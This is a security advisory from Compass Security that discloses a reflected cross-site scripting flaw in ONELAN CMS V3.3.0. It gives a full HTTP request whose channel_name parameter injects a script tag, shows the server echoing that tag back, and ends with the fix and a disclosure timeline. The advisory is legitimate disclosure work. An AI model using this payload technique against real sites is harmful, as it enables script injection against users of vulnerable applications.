#############################################################
#
# COMPASS SECURITY ADVISORY
# https://www.compass-security.com/research/advisories/
#
#############################################################
#
# Product:  ONELAN CMS [1]
# Vendor:   ONELAN
# CSNC ID:  CSNC-2018-005
# Subject:  Reflected Cross-Site Scripting
# Risk:     High
# Effect:   Remotely exploitable
# Author:   Stephan Sekula <stephan.sekula@compass-security.com>
# Date:     06.02.2018
#
#############################################################

Introduction:
-------------
The ONELAN Content Management System (CMS) software leverages more than a
decade of development and industry experience to deliver users a business
tool that makes creating, publishing and managing content simple and
dependable. [1]

Compass Security discovered a security flaw in the ONELAN CMS, which
allows injecting client-side code into the application.


Affected:
---------
Vulnerable:
 * CMS V3.3.0 Build 56815

 
Technical Description
---------------------
Users are able to publish channels via the CMS. Manipulating the parameter
channel_name in the respective requests will lead to the manipulated contents
being included in the resulting response.

Request:
POST /channel_manager HTTP/1.1
Host: [CUT]
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Content-Type: application/x-www-form-urlencoded
Content-Length: 106
Cookie: session=[CUT]; media=media;
CMS_TOKEN=[CUT]
Connection: close 

channel_name=Default%20ChannelCSNC<script>alert(0)</script>&
multichannel_id=1&command=channel_publish_asap

Response:
HTTP/1.1 302 Found
Date: Tue, 06 Feb 2018 21:40:28 GMT
Server: Apache
Set-Cookie: session=[CUT];path=/;httponly;secure;
Content-length: 807
Location: /status/channels.json?_=%271517936029.851774-7%27&retry_interval=0
Cache-Control: no-cache
Connection: close  
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Redirecting to /status/channels.json?_=%271517936029.851774-7%27&amp;
    retry_interval=0</title>
</head>
<body>
<h1>Redirecting to <a href="/status/channels.json?_=%271517936029.851774-7%27
    &amp;retry_interval=0">/status/channels.json?_=%271517936029.851774-7%27
	&amp;retry_interval=0</a></h1>
<div id="feedback">
<div class="local_message success_local_message status_good">
<p class="headline_message">Channel "Default ChannelCSNC<script>alert(0)</script>"
    started publishing at Today 22:40:28</p>
</div></div>
</body>
</html>


Workaround / Fix:
-----------------
This issue can be fixed by properly encoding user-provided input when displayed
back to the user.


Timeline:
---------
2018-05-29:     Public disclosure
2018-05-28:     Release of fixed version/patch
2018-02-12:     Initial vendor response
2018-02-06:     Initial vendor notification
2018-02-06:     Discovery by Stephan Sekula


References:
-----------
[1] https://onelan.com/products/publisher-cms/